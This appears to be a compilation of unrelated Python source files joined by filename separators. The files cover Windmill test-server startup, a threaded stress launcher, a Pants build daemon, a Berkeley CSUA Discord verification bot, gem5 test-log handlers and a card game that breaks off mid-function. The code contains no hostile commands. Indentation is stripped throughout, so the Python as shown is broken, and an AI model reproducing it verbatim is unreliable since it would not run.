getattr(httpd_thread, 'setDaemon', lambda x: x)(True)
httpd_thread.start()
while not httpd.ready:
sleep(.25)
return httpd, httpd_thread
def configure_global_settings(logging_on=True):
"""Configure that global settings for the current run"""
# This logging stuff probably shouldn't be here, it should probably be abstracted
if logging_on:
logging.getLogger().setLevel(0)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
if os.environ.has_key('WINDMILL_CONFIG_FILE'):
local_settings = os.environ['WINDMILL_CONFIG_FILE']
else:
local_settings = None
windmill.settings = conf.configure_settings(localSettings=local_settings)
if 'controllers' not in windmill.settings:
windmill.settings['controllers'] = []
port = windmill.settings['SERVER_HTTP_PORT']
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
port += 1
except socket.error:
break
windmill.settings['SERVER_HTTP_PORT'] = port
return windmill.settings
on_ide_awake = []
def setup():
"""Setup server and shell objects"""
global shell_objects_dict
shell_objects_dict = {}
windmill.settings['shell_objects'] = shell_objects_dict
assert not windmill.settings.get('setup_has_run', False)
httpd, httpd_thread = run_threaded(windmill.settings['CONSOLE_LOG_LEVEL'])
shell_objects_dict['httpd'] = httpd
shell_objects_dict['httpd_thread'] = httpd_thread
from windmill.bin import shell_objects
if windmill.settings['CONTINUE_ON_FAILURE'] is not False:
shell_objects.jsonrpc_client.add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
if windmill.settings['EXTENSIONS_DIR'] is not None:
shell_objects.load_extensions_dir(windmill.settings['EXTENSIONS_DIR'])
if windmill.settings['RUN_TEST'] is not None:
shell_objects.run_test(windmill.settings['RUN_TEST'])
if windmill.settings['LOAD_TEST'] is not None:
shell_objects.load_test(windmill.settings['LOAD_TEST'])
if windmill.settings['JAVASCRIPT_TEST_DIR']:
shell_objects.run_js_tests(windmill.settings['JAVASCRIPT_TEST_DIR'],
windmill.settings['JAVASCRIPT_TEST_FILTER'],
windmill.settings['JAVASCRIPT_TEST_PHASE'])
browser = [setting for setting in windmill.settings.keys() if setting.startswith('START_') and \
windmill.settings[setting] is True]
import shell_objects
if len(browser) is 1:
shell_objects_dict['browser'] = getattr(shell_objects, browser[0].lower())()
for attribute in dir(shell_objects):
shell_objects_dict[attribute] = getattr(shell_objects, attribute)
shell_objects_dict['setup_has_run'] = True
return shell_objects_dict
def teardown(shell_objects):
"""Teardown the server, threads, and open browsers."""
if windmill.is_active:
windmill.is_active = False
shell_objects['clear_queue']()
for controller in windmill.settings['controllers']:
controller.stop()
del(controller)
if windmill.settings['START_FIREFOX'] and windmill.settings['MOZILLA_CREATE_NEW_PROFILE']:
shutil.rmtree(windmill.settings['MOZILLA_PROFILE'])
for directory in windmill.teardown_directories:
if os.path.isdir(directory):
shutil.rmtree(directory)
# while shell_objects['httpd_thread'].isAlive():
# try:
# shell_objects['httpd'].stop()
# except Exception, e:
# print "Exception occurred while shutting server down:"
# print e
#
# # Hacking workaround for port locking up on linux.
# if sys.platform == 'linux2':
# try:
# shell_objects['httpd'].socket.shutdown(socket.SHUT_RDWR)
# shell_objects['httpd'].socket.close()
# except: pass
shell_objects['httpd'].stop()
#shell_objects['httpd_thread'].join()
def runserver_action(shell_objects):
"""Run the server in the foreground with the options given to the command line"""
try:
if 'runserver' in sys.argv or len(windmill.settings['controllers']) is 0:
print 'Server running...'
if windmill.settings['EXIT_ON_DONE'] and not windmill.settings['JAVASCRIPT_TEST_DIR']:
while windmill.block_exit or (
len(shell_objects['httpd'].controller_queue.queue) is not 0 ) or (
len(shell_objects['httpd'].test_resolution_suite.unresolved) is not 0 ):
sleep(.25)
elif ( windmill.settings['RUN_TEST'] ):
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
else:
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
teardown(shell_objects)
if windmill.test_has_failed:
sys.exit(1)
except KeyboardInterrupt:
teardown(shell_objects)
sys.exit(1)
def shell_action(shell_objects):
"""Start the windmill shell environment"""
windmill.in_shell = True
# If ipython is installed and we weren't given the usecode option
try:
assert not windmill.settings['USECODE']
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed()
ipshell(local_ns=shell_objects)
except:
import code
code.interact(local=shell_objects)
teardown(shell_objects)
# def wxui_action(shell_objects):
# """Start the wxPython based service GUI"""
# try:
# import wxui
# app = wxui.App(shell_objects)
# shell_objects['wxui_app'] = app
# app.MainLoop()
# teardown(shell_objects)
# except ImportError:
# print 'Failed to import wx, defaulting to the shell'
# shell_action(shell_objects)
# def tinderbox_action(shell_objects):
# """Tinderbox action for continuous integration"""
# shell_objects['jsonrpc_client'].add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
#
# class ResultsProcessor(object):
# passed = 0
# failed = 0
# def success(self, test, debug):
# self.passed += 1
# def failure(self, test, debug):
# self.failed += 1
#
# result_processor = ResultsProcessor()
# shell_objects['httpd'].test_resolution_suite.result_processor = result_processor
#
# starttime = datetime.now()
# result = None
#
# if windmill.settings['RUN_TEST']:
# try:
# while ( len(shell_objects['httpd'].controller_queue.queue) is not 0 ) or (
# len(shell_objects['httpd'].test_resolution_suite.unresolved) is not 0 ):
# sleep(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
#
# if result_processor.failed > 0 or result_processor.passed is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
# else:
# try:
# while not windmill.TESTS_COMPLETED:
# sleep(1)
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
# if windmill.RESULTS['fail'] > 0 or windmill.RESULTS['pass'] is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
def start_windmill():
"""Start windmill and return shell_objects"""
configure_global_settings()
shell_objects = setup()
return shell_objects
def command_line_startup():
"""Command line startup"""
windmill.stdout, windmill.stdin = sys.stdout, sys.stdin
configure_global_settings()
action = process_options(sys.argv)
shell_objects = setup()
action(shell_objects)
action_mapping = {'shell':shell_action, 'runserver':runserver_action,
'run_service':runserver_action}
|
stress.py
|
import sys, os
from threading import Thread
def stress(name):
os.system('python whole_user_test.py ' + name)
for i in range(int(sys.argv[1])):
t = Thread(target=stress, args=( ('user' + str(i),) ))
t.start()
|
pants_daemon.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import threading
from setproctitle import setproctitle as set_process_title
from pants.goal.run_tracker import RunTracker
from pants.logging.setup import setup_logging
from pants.pantsd.process_manager import ProcessManager
class _StreamLogger(object):
"""A sys.{stdout,stderr} replacement that pipes output to a logger."""
def __init__(self, logger, log_level):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
"""
self._logger = logger
self._log_level = log_level
def write(self, msg):
for line in msg.rstrip().splitlines():
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
class PantsDaemon(ProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception): pass
class RuntimeFailure(Exception): pass
def __init__(self, build_root, work_dir, log_level, log_dir=None, services=None,
metadata_base_dir=None, reset_func=None):
"""
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param string log_dir: The directory to use for file-based logging via the daemon. (Optional)
:param tuple services: A tuple of PantsService instances to launch/manage. (Optional)
:param callable reset_func: Called after the daemon is forked to reset
any state inherited from the parent process. (Optional)
"""
super(PantsDaemon, self).__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._logger = logging.getLogger(__name__)
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._log_dir = log_dir or os.path.join(work_dir, self.name)
self._services = services or ()
self._reset_func = reset_func
self._socket_map = {}
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
@property
def is_killed(self):
return self._kill_switch.is_set()
def set_services(self, services):
self._services = services
def set_socket_map(self, socket_map):
self._socket_map = socket_map
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
for service, service_thread in service_thread_map.items():
self._logger.info('terminating pantsd service: {}'.format(service))
service.terminate()
service_thread.join()
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_fds():
"""Close pre-fork stdio streams to avoid output in the pants process that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
def _setup_logging(self, log_level):
"""Reinitialize logging post-fork to clear all handlers, file descriptors, locks etc.
This must happen first thing post-fork, before any further logging is emitted.
"""
# Re-initialize the childs logging locks post-fork to avoid potential deadlocks if pre-fork
# threads have any locks acquired at the time of fork.
logging._lock = threading.RLock() if logging.thread else None
for handler in logging.getLogger().handlers:
handler.createLock()
# Invoke a global teardown for all logging handlers created before now.
logging.shutdown()
# Reinitialize logging for the daemon context.
setup_logging(log_level, console_stream=None, log_dir=self._log_dir, log_name=self.LOG_NAME)
# Close out pre-fork file descriptors.
self._close_fds()
# Redirect stdio to the root logger.
sys.stdout = _StreamLogger(logging.getLogger(), logging.INFO)
sys.stderr = _StreamLogger(logging.getLogger(), logging.WARN)
self._logger.debug('logging initialized')
def _setup_services(self, services):
for service in services:
self._logger.info('setting up service {}'.format(service))
service.setup()
def _run_services(self, services):
"""Service runner main loop."""
if not services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: threading.Thread(target=service.run) for service in services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info('starting service {}'.format(service))
try:
service_thread.start()
except (RuntimeError, service.ServiceError):
self.shutdown(service_thread_map)
raise self.StartupFailure('service {} failed to start, shutting down!'.format(service))
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise self.RuntimeFailure('service failure for {}, shutting down!'.format(service))
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def _run(self):
"""Synchronously run pantsd."""
# Switch log output to the daemon's log stream from here forward.
self._setup_logging(self._log_level)
self._logger.info('pantsd starting, log level is {}'.format(self._log_level))
# Purge as much state as possible from the pants run that launched us.
if self._reset_func:
self._reset_func()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title('pantsd [{}]'.format(self._build_root))
# Write service socket information to .pids.
self._write_named_sockets(self._socket_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def pre_fork(self):
"""Pre-fork() callback for ProcessManager.daemonize()."""
# Teardown the RunTracker's SubprocPool pre-fork.
RunTracker.global_instance().shutdown_worker_pool()
# TODO(kwlzn): This currently aborts tracking of the remainder of the pants run that launched
# pantsd.
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemonize()."""
self._run()
|
bot.py
|
import asyncio
import logging
import threading
import unicodedata
import discord
from decouple import config
from discord.utils import get
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from pyfiglet import figlet_format
from .utils import send_verify_mail
from . import xkcd
intents = discord.Intents.all()
intents.presences = False
TOKEN = config("DISCORD_TOKEN", default="")
CSUA_GUILD_ID = config("TEST_GUILD", default=784902200102354985, cast=int)
CSUA_PHILBOT_CLIENT_ID = config("BOT_ID", default=737930184837300274, cast=int)
HOSER_ROLE_ID = config("TEST_ROLE", default=785418569412116513, cast=int) # Verified
DEBUG_CHANNEL_ID = config("DEBUG_CHANNEL", default=788989977794707456, cast=int)
TIMEOUT_SECS = 10
logger = logging.getLogger(__name__)
class CSUAClient(discord.Client):
async def on_ready(self):
print(f"{self.user} has connected to Discord")
self.is_phillip = self.user.id == CSUA_PHILBOT_CLIENT_ID
if self.is_phillip:
self.csua_guild = get(self.guilds, id=CSUA_GUILD_ID)
self.test_channel = get(self.csua_guild.channels, id=DEBUG_CHANNEL_ID)
self.hoser_role = get(self.csua_guild.roles, id=HOSER_ROLE_ID)
async def verify_member_email(self, user):
channel = user.dm_channel
def check_msg(msg):
return msg.channel == channel
got_email = False
while not got_email:
msg = await self.wait_for("message", check=check_msg)
try:
validate_email(msg.content)
if "@berkeley.edu" in msg.content:
got_email = True
await channel.send(
f"Sending a an email to verify {user.name} to {msg.content}"
)
send_verify_mail(msg.content, user.name + "#" + user.discriminator)
else:
await channel.send(
f"{msg.content} is not a berkeley email. Please fix this"
)
except ValidationError as e:
await channel.send(
f"{msg.content} is not a valid email. Please try again. Details: {e}"
)
async def on_message(self, message):
if message.author == self.user:
return
msg = message.content.lower()
if "hkn" in msg and "ieee" in msg:
await message.channel.send("Do I need to retrieve the stick?")
if "is typing" in msg:
await message.channel.send("unoriginal")
if msg.count("cpma") >= 2:
for emoji in emoji_letters("wtfiscpma"):
await message.add_reaction(emoji)
elif "based" in msg:
for emoji in emoji_letters("based"):
await message.add_reaction(emoji)
await message.add_reaction("😎")
elif "tree" in msg or "stanford" in msg or "stanfurd" in msg:
emoji = unicodedata.lookup(
"EVERGREEN TREE"
) # todo: add official <:tree:744335009002815609>
await message.add_reaction(emoji)
elif "drip" in msg or "👟" in msg or "🥵" in msg:
for emoji in emoji_letters("drip"):
await message.add_reaction(emoji)
await message.add_reaction("👟")
if "!xkcd" in msg:
# Validate "!xkcd" command
if xkcd.is_valid_xkcd_command(msg):
await xkcd.get_xkcd(message)
else:
await message.channel.send(
"Please ensure that your command is properly formatted. Type `!xkcd -help` for more information."
)
if message.content.startswith("!figlet "):
text = message.content.split(" ", 1)[1]
if len(text) > 200:
await message.channel.send("!figlet: Message too long")
return
formatted = figlet_format(text)
# Discord has a 2000 character limit
if len(formatted) > 1994:
await message.channel.send("!figlet: Message too long")
return
await message.channel.send(f"```{formatted}```")
async def on_member_join(self, member):
msg = await member.send(
"Welcome to the CSUA discord server! First, read the rules in #landing-zone. Thumbs up this message if you agree"
)
await self.test_channel.send(f"Sent initial discord message to {member}")
def check_thumb(react, _):
return react.message == msg and str(react.emoji) == "👍" # thumbs
await self.wait_for("reaction_add", check=check_thumb)
await self.test_channel.send(f"{member} read rules")
await member.send(
"Verify your berkeley.edu email to gain access. First, please type your email. Please contact a moderator if you have any issues."
)
await self.test_channel.send(f"{member} was prompted for email")
await self.verify_member_email(member)
if self.is_phillip:
await self.test_channel.send(f"{member} was sent registration email")
def emoji_letters(chars):
return [unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}") for c in chars]
class CSUABot:
"""
Wraps CSUAClient by abstracting thread and event loop logic.
All the discord.Client coroutines must be called using
`asyncio.run_coroutine_threadsafe` because the client is running inside an
event loop in a separate thread. Event loops are one per-thread, and Django
can't handle async code, so a separate thread is used instead.
"""
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._start, daemon=True)
self.running = True
self.thread.start()
def _start(self):
asyncio.set_event_loop(self.loop)
self.client = CSUAClient(intents=intents)
try:
self.loop.run_until_complete(self.client.start(TOKEN))
finally:
self.loop.run_until_complete(self.client.logout())
self.loop.close()
def promote_user_to_hoser(self, tag):
if not hasattr(self.client, "csua_guild"):
client = self.client
print(client)
member = self.client.csua_guild.get_member_named(tag)
if member:
asyncio.run_coroutine_threadsafe(
member.add_roles(self.client.hoser_role), self.loop
).result(TIMEOUT_SECS)
asyncio.run_coroutine_threadsafe(
self.client.test_channel.send(f"verified {tag}"), self.loop
).result(TIMEOUT_SECS)
return True
return False
if TOKEN:
csua_bot = CSUABot()
else:
csua_bot = None
|
handlers.py
|
# Copyright (c) 2017 Mark D. Hill and David A. Wood
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Sean Wilson
'''
Handlers for the testlib Log.
'''
from __future__ import print_function
import multiprocessing
import os
import Queue
import sys
import threading
import time
import traceback
import helper
import log
import result
import state
import test
import terminal
from config import config, constants
class _TestStreamManager(object):
def __init__(self):
self._writers = {}
def open_writer(self, test_result):
if test_result in self._writers:
raise ValueError('Cannot have multiple writters on a single test.')
self._writers[test_result] = _TestStreams(test_result.stdout,
test_result.stderr)
def get_writer(self, test_result):
if test_result not in self._writers:
self.open_writer(test_result)
return self._writers[test_result]
def close_writer(self, test_result):
if test_result in self._writers:
writer = self._writers.pop(test_result)
writer.close()
def close(self):
for writer in self._writers.values():
writer.close()
self._writers.clear()
class _TestStreams(object):
def __init__(self, stdout, stderr):
helper.mkdir_p(os.path.dirname(stdout))
helper.mkdir_p(os.path.dirname(stderr))
self.stdout = open(stdout, 'w')
self.stderr = open(stderr, 'w')
def close(self):
self.stdout.close()
self.stderr.close()
class ResultHandler(log.Handler):
'''
Log handler which listens for test results and output saving data as
it is reported.
When the handler is closed it writes out test results in the python pickle
format.
'''
def __init__(self, schedule, directory):
'''
:param schedule: The entire schedule as a :class:`LoadedLibrary`
object.
:param directory: Directory to save test stdout/stderr and aggregate
results to.
'''
self.directory = directory
self.internal_results = result.InternalLibraryResults(schedule,
directory)
self.test_stream_manager = _TestStreamManager()
self._closed = False
self.mapping = {
log.LibraryStatus.type_id: self.handle_library_status,
log.SuiteResult.type_id: self.handle_suite_result,
log.TestResult.type_id: self.handle_test_result,
log.TestStderr.type_id: self.handle_stderr,
log.TestStdout.type_id: self.handle_stdout,
}
def handle(self, record):
if not self._closed:
self.mapping.get(record.type_id, lambda _:None)(record)
def handle_library_status(self, record):
if record['status'] in (state.Status.Complete, state.Status.Avoided):
self.test_stream_manager.close()
def handle_suite_result(self, record):
suite_result = self.internal_results.get_suite_result(
record['metadata'].uid)
suite_result.result = record['result']
def handle_test_result(self, record):
test_result = self._get_test_result(record)
test_result.result = record['result']
def handle_stderr(self, record):
self.test_stream_manager.get_writer(
self._get_test_result(record)
).stderr.write(record['buffer'])
def handle_stdout(self, record):
self.test_stream_manager.get_writer(
self._get_test_result(record)
).stdout.write(record['buffer'])
def _get_test_result(self, test_record):
return self.internal_results.get_test_result(
test_record['metadata'].uid,
test_record['metadata'].suite_uid)
def _save(self):
#FIXME Hardcoded path name
result.InternalSavedResults.save(
self.internal_results,
os.path.join(self.directory, constants.pickle_filename))
result.JUnitSavedResults.save(
self.internal_results,
os.path.join(self.directory, constants.xml_filename))
def close(self):
if self._closed:
return
self._closed = True
self._save()
def unsuccessful(self):
'''
Performs an or reduce on all of the results.
Returns true if at least one test is unsuccessful, false when all tests
pass
'''
for suite_result in self.internal_results:
if suite_result.unsuccessful:
return True
# If all are successful, then this wasn't "unsuccessful"
return False
#TODO Change from a handler to an internal post processor so it can be used
# to reprint results
class SummaryHandler(log.Handler):
'''
A log handler which listens to the log for test results
and reports the aggregate results when closed.
'''
color = terminal.get_termcap()
reset = color.Normal
colormap = {
state.Result.Errored: color.Red,
state.Result.Failed: color.Red,
state.Result.Passed: color.Green,
state.Result.Skipped: color.Cyan,
}
sep_fmtkey = 'separator'
sep_fmtstr = '{%s}' % sep_fmtkey
def __init__(self):
self.mapping = {
log.TestResult.type_id: self.handle_testresult,
log.LibraryStatus.type_id: self.handle_library_status,
}
self._timer = helper.Timer()
self.results = []
def handle_library_status(self, record):
if record['status'] == state.Status.Building:
self._timer.restart()
def handle_testresult(self, record):
result = record['result'].value
if result in (state.Result.Skipped, state.Result.Failed,
state.Result.Passed, state.Result.Errored):
self.results.append(result)
def handle(self, record):
self.mapping.get(record.type_id, lambda _:None)(record)
def close(self):
print(self._display_summary())
def _display_summary(self):
most_severe_outcome = None
outcome_fmt = ' {count} {outcome}'
strings = []
outcome_count = [0] * len(state.Result.enums)
for result in self.results:
outcome_count[result] += 1
# Iterate over enums so they are in order of severity
for outcome in state.Result.enums:
outcome = getattr(state.Result, outcome)
count = outcome_count[outcome]
if count:
strings.append(outcome_fmt.format(count=count,
outcome=state.Result.enums[outcome]))
most_severe_outcome = outcome
string = ','.join(strings)
if most_severe_outcome is None:
string = ' No testing done'
most_severe_outcome = state.Result.Passed
else:
string = ' Results:' + string + ' in {:.2} seconds '.format(
self._timer.active_time())
string += ' '
return terminal.insert_separator(
string,
color=self.colormap[most_severe_outcome] + self.color.Bold)
class TerminalHandler(log.Handler):
color = terminal.get_termcap()
verbosity_mapping = {
log.LogLevel.Warn: color.Yellow,
log.LogLevel.Error: color.Red,
}
default = color.Normal
def __init__(self, verbosity=log.LogLevel.Info, machine_only=False):
self.stream = verbosity >= log.LogLevel.Trace
self.verbosity = verbosity
self.machine_only = machine_only
self.mapping = {
log.TestResult.type_id: self.handle_testresult,
log.SuiteStatus.type_id: self.handle_suitestatus,
log.TestStatus.type_id: self.handle_teststatus,
log.TestStderr.type_id: self.handle_stderr,
log.TestStdout.type_id: self.handle_stdout,
log.TestMessage.type_id: self.handle_testmessage,
log.LibraryMessage.type_id: self.handle_librarymessage,
}
def _display_outcome(self, name, outcome, reason=None):
print(self.color.Bold
+ SummaryHandler.colormap[outcome]
+ name
+ ' '
+ state.Result.enums[outcome]
+ SummaryHandler.reset)
if reason is not None:
log.test_log.info('')
log.test_log.info('Reason:')
log.test_log.info(reason)
log.test_log.info(terminal.separator('-'))
def handle_teststatus(self, record):
if record['status'] == state.Status.Running:
log.test_log.debug('Starting Test Case: %s' %\
record['metadata'].name)
def handle_testresult(self, record):
self._display_outcome(
'Test: %s' % record['metadata'].name,
record['result'].value)
def handle_suitestatus(self, record):
if record['status'] == state.Status.Running:
log.test_log.debug('Starting Test Suite: %s ' %\
record['metadata'].name)
def handle_stderr(self, record):
if self.stream:
print(record.data['buffer'], file=sys.stderr, end='')
def handle_stdout(self, record):
if self.stream:
print(record.data['buffer'], file=sys.stdout, end='')
def handle_testmessage(self, record):
if self.stream:
print(self._colorize(record['message'], record['level']))
def handle_librarymessage(self, record):
if not self.machine_only or record.data.get('machine_readable', False):
print(self._colorize(record['message'], record['level'],
record['bold']))
def _colorize(self, message, level, bold=False):
return '%s%s%s%s' % (
self.color.Bold if bold else '',
self.verbosity_mapping.get(level, ''),
message,
self.default)
def handle(self, record):
if record.data.get('level', self.verbosity) > self.verbosity:
return
self.mapping.get(record.type_id, lambda _:None)(record)
def set_verbosity(self, verbosity):
self.verbosity = verbosity
class PrintHandler(log.Handler):
def __init__(self):
pass
def handle(self, record):
print(str(record).rstrip())
def close(self):
pass
class MultiprocessingHandlerWrapper(log.Handler):
'''
A handler class which forwards log records to subhandlers, enabling
logging across multiprocessing python processes.
The 'parent' side of the handler should execute either
:func:`async_process` or :func:`process` to forward
log records to subhandlers.
'''
def __init__(self, *subhandlers):
# Create thread to spin handing recipt of messages
# Create queue to push onto
self.queue = multiprocessing.Queue()
self.queue.cancel_join_thread()
self._shutdown = threading.Event()
# subhandlers should be accessed with the _handler_lock
self._handler_lock = threading.Lock()
self._subhandlers = subhandlers
def add_handler(self, handler):
self._handler_lock.acquire()
self._subhandlers = (handler, ) + self._subhandlers
self._handler_lock.release()
def _with_handlers(self, callback):
exception = None
self._handler_lock.acquire()
for handler in self._subhandlers:
# Prevent deadlock when using this handler by delaying
# exception raise until we get a chance to unlock.
try:
callback(handler)
except Exception as e:
exception = e
break
self._handler_lock.release()
if exception is not None:
raise exception
def async_process(self):
self.thread = threading.Thread(target=self.process)
self.thread.daemon = True
self.thread.start()
def process(self):
while not self._shutdown.is_set():
try:
item = self.queue.get(timeout=0.1)
self._handle(item)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
return
except Queue.Empty:
continue
def _drain(self):
while True:
try:
item = self.queue.get(block=False)
self._handle(item)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
return
except Queue.Empty:
return
def _handle(self, record):
self._with_handlers(lambda handler: handler.handle(record))
def handle(self, record):
self.queue.put(record)
def _close(self):
if hasattr(self, 'thread'):
self.thread.join()
_wrap(self._drain)
self._with_handlers(lambda handler: _wrap(handler.close))
# NOTE Python2 has an known bug which causes IOErrors to be raised
# if this shutdown doesn't go cleanly on both ends.
# This sleep adds some time for the sender threads on this process to
# finish pickling the object and complete shutdown after the queue is
# closed.
time.sleep(.2)
self.queue.close()
time.sleep(.2)
def close(self):
if not self._shutdown.is_set():
self._shutdown.set()
self._close()
def _wrap(callback, *args, **kwargs):
try:
callback(*args, **kwargs)
except:
traceback.print_exc()
|
broom.py
|
#!/usr/bin/env
import random
from collections import namedtuple
from typing import List
from itertools import combinations
from functools import reduce
import threading
import time
import simple_app
from .simple_app import playround
thread = threading.Thread(target=simple_app.playround)
thread.start()
result_available = threading.Event()
result = None
Card = namedtuple("Card", ['suit', 'face', 'owner'])
faces = list(range(1,11))
suits = ['B', 'O', 'E', 'C']
def make_deck():
return { str(n) + s: Card(suit=s, face=n, owner='') for n in faces for s in suits }
CardStore = make_deck()
def make_deck_from(card_ids :list):
return { card_id: CardStore[card_id] for card_id in card_ids }
def shuffle(deck :list):
random.shuffle(deck)
return deck
def get_escombinations(cards: set, pivot: str):
combos = set()
#combos.add(frozenset(cards | set([pivot])))
for i in range(len(cards)):
r = len(cards) + 1 - i # combinatorial order (from the 5 choose 'x' where 'x' is order)
combs = combinations(cards | set([pivot]),r)
for combo in combs:
combo_vals = [CardStore[c].face for c in combo ]
if ( pivot in combo # pivot card is the player's card - has to be part of combo
and sum(combo_vals) == 15 # only plays that add to 15 are considered, all other plays are equivalent to laying down card on table
or r > len(cards) ):
combos.add(combo)
return combos
class Deck:
card_store = {}
deck_order = []
def __init__(self,card_store={}):
self.card_store = card_store
self.deck_order = list(card_store.keys())
random.shuffle(self.deck_order)
print("Hello deck {}".format(self.deck_order))
def shuffle(self):
return random.shuffle(self.deck_order)
def deal(self, n=1, owner=''):
d = self.deck_order[:n]
self.deck_order = self.deck_order[n:]
return set(d)
# def update_store(card,store, owner):
# store.owner = owner
# return store[card]
# return [update_store(delt,self.card_store, owner) for delt in d]
def cards(self):
return self.card_store
def order(self):
return self.deck_order
class Player:
score = 0
hand = set()
name = ''
def __init__(self, name, hand=[]):
self.name = name
def play_turn(self,deck):
return NotImplemented
def new_hand(self, cards):
self.hand = cards
def award_point(self, points=1):
self.score += points
def get_play(self, playable: list, table_cards=[]):
play = set()
if len(playable) == 0: # never happens
play.add(random.choice(list(self.hand))) # no playable because table_cards were probably empty so play random card
else:
play = playable
#for card in play:
#if card in self.hand:
#self.hand.discard(card)
if len(play) > 1 :
good_hands = [p for p in play if sum([CardStore[c].face for c in p]) == 15 ]
if len(good_hands) > 0:
return random.choice(good_hands)
return random.choice(list(play))
return play.pop()
class Game:
deck = Deck()
pl1 = Player('p1')
pl2 = Player('p2')
table_cards = set()
def __init__(self, pl1, pl2, deck=Deck()):
self.pl1 = pl1
self.pl2 = pl2
self.deck = deck
print("Start game")
#return NotImplemented
def set_card_owner(self, card, owner):
c = self.deck.cards()[card]
self.deck.cards()[card] = Card(suit=c.suit, face=c.face, owner=owner)
def reset_deck(self):
self.deck = Deck(make_deck())
def deal_hand(self):
p1 = set()
p2 = set()
print(len(self.deck.order()))
# deal out to p1 and p2 alternating 3 each
for count in range(0,3):
[ p1.add(d) for d in self.deck.deal()]
[ p2.add(d) for d in self.deck.deal()]
print(len(self.deck.order()))
return p1,p2
def deal_start(self):
p1,p2 = self.deal_hand()
start_table_cards = self.deck.deal(4)
return p1,p2,start_table_cards
def valid_plays(self, player, table_cards: set):
# visible_cards = [card for card_id, card in self.deck.cards.items() if (card.owner == 'table') ]
plays = set()
for card in player.hand:
if (len(table_cards) > 0):
combo_cards = set(table_cards)
escombinations = get_escombinations(combo_cards,card)
for combo in escombinations:
plays.add(combo)
else:
